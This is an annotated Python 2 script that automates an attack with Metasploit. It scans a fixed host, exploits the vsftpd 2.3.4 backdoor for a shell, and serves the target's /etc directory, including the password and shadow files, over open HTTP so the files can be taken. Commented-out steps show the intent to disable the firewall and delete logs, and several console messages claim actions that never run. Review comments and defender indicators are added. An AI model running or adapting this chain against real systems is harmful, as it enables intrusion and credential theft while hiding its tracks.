from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole
import os
import sys
import string
import time
# Lab automation script (Python 2 only: print statements and execfile).
# It scans one hard-coded host, starts a local Metasploit RPC daemon, runs the
# vsftpd_234_backdoor module against that host and then drives the resulting
# session. Every address, port and credential below is a literal.
# Prerequisite noted by the author: the Metasploit database and postgresql
# must already be running.

# Scan of all TCP ports (-p-), no DNS resolution (-n), verbose (-v); stdout is
# redirected to a file under /home. os.system hands the string to a shell and
# the exit status is ignored, so a failed scan or failed write goes unnoticed.
os.system("nmap -v -n -p- 192.168.1.24 > /home/PortsAndPortTypes.txt")
# Starts msfrpcd in a new terminal, in the foreground (-f), bound to loopback
# (-a 127.0.0.1).
# NOTE(review): the RPC password is a weak literal passed on the command line,
# where other local users can typically read it from the process list; the same
# literal is repeated in the MsfRpcClient call below.
os.system("gnome-terminal -e 'msfrpcd -P abc123 -f -a 127.0.0.1'")
# Fixed wait for the daemon to come up; there is no readiness check.
time.sleep(10)
# NOTE(review): port is passed as a string here; confirm the client accepts it.
client = MsfRpcClient('abc123', ssl=True, port='55553')
# NOTE(review): console is not referenced again in the lines shown.
console = MsfRpcConsole(client)
# Select the exploit module and point it at the same hard-coded host.
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
exploit['RHOSTS'] = '192.168.1.24'
exploit['VERBOSE'] = True
# The return value of execute() is not inspected.
exploit.execute(payload='cmd/unix/interact')
# Fixed wait for the session to be established (the author's comments describe
# it as a root session).
time.sleep(15)
# NOTE(review): session id 1 is assumed; the script never confirms that a
# session with that id exists before using it.
shell = client.sessions.session(1)
# The next four messages are printed only: the ufw command is commented out and
# no copy command is written to the session, so the console output overstates
# what actually ran on the target.
print "Disabling security...\n"
#shell.write("sudo ufw disable\n")
print "Copying the password file...\n"
print "Copying the shadow password file...\n"
print "Copying port numbers and port types...\n"
time.sleep(30)
# Starts Python's SimpleHTTPServer on the target with /etc as its working
# directory, on port 55555. That serves the directory over unauthenticated
# HTTP to any host able to reach the port, not only to this script.
# For defenders: an unexpected listener on this port rooted at /etc is a useful
# host-side indicator, as is the preceding scan of every TCP port.
shell.write("cd /etc\n")
shell.write("python -m SimpleHTTPServer 55555\n")
print("Turning on server...\n")
time.sleep(10)
# execfile is a Python 2 builtin; it runs ReceiveData.py (not shown here),
# resolved against the current working directory, in this script's namespace.
execfile("ReceiveData.py")
# Printed only; the ufw command stays commented out.
print "\nEnabling security...\n"
#shell.write("sudo ufw enable\n")
# Printed only; the command below is commented out, so nothing is removed.
# Forwarding logs off-host keeps evidence intact if such a step were enabled.
print "Deleting system logs...\n"
#shell.write("sudo rm /etc/syslog.conf\n")
print "Exiting session...\n"
shell.write("exit\n")
print "Killing all job processes...\n"
# NOTE(review): these writes go to the same session after "exit" was already
# sent, and "^C" is the two characters caret and C rather than a control byte.
# Nothing in the lines shown stops the HTTP server started above or the
# msfrpcd daemon, so both may outlive the script.
shell.write("jobs -K\n")
shell.write("exit\n")
shell.write("logout\n")
shell.write("^C\n")
# The data returned by read() is discarded.
shell.read()
print "Exploit complete\n"